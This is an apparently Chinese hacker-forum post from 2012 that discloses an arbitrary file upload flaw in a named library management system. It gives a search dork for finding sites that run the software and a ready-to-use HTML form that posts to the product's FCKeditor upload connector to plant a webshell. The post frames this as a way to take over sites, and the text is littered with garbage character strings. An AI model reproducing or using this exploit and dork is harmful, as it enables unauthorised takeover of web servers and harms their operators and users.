主题:图书馆系统任意文件上传漏洞
# g( d" M" H$ M5 p 作者:冰锋刺客% J" ^+ k; e( t2 E
厂商:点击书(dianjishu.com). Z) ^4 _& K& u4 b8 H" j
日期:2012-6-21
: f1 Y: e L( H4 N7 h% B9 F J2 h9 G3 E4 v) X2 Q
I 概述
7 n6 M! Z# x; R+ F) n 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell. K% x( m" F1 B* t& G/ L$ k i
II 简介! L! n+ b- I3 {( r1 |
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
0 ]% D' E' j8 [3 E4 i 补充一个漏洞
8 @# W$ L8 h* C <form id="frmUpload" enctype="multipart/form-data"# [ k6 S) d& X3 _- T
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>% w+ ?5 s) t2 V% h$ ]) \. ?
<input id="btnUpload" type="submit" value="操翻他">( h$ Q9 \9 {% o4 d9 s, m
</form>
: r% U8 z1 Z% L( V: J 你们懂的, U7 m& i: t5 p |2 O0 q% r
那傻逼提供还需要改包.
8 N9 a* F: x0 S, E9 t. Q" k! r 自己看了下源代码发现fckeditor
8 f0 |2 P( h* I! Q! g 直接秒杀
$ d# D6 z1 m6 g* Y |
发表于 2012-9-10 21:20:59
收藏
支持
反对